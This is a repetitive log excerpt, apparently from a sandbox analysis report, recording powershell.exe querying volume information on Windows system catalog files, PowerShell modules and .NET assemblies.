    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
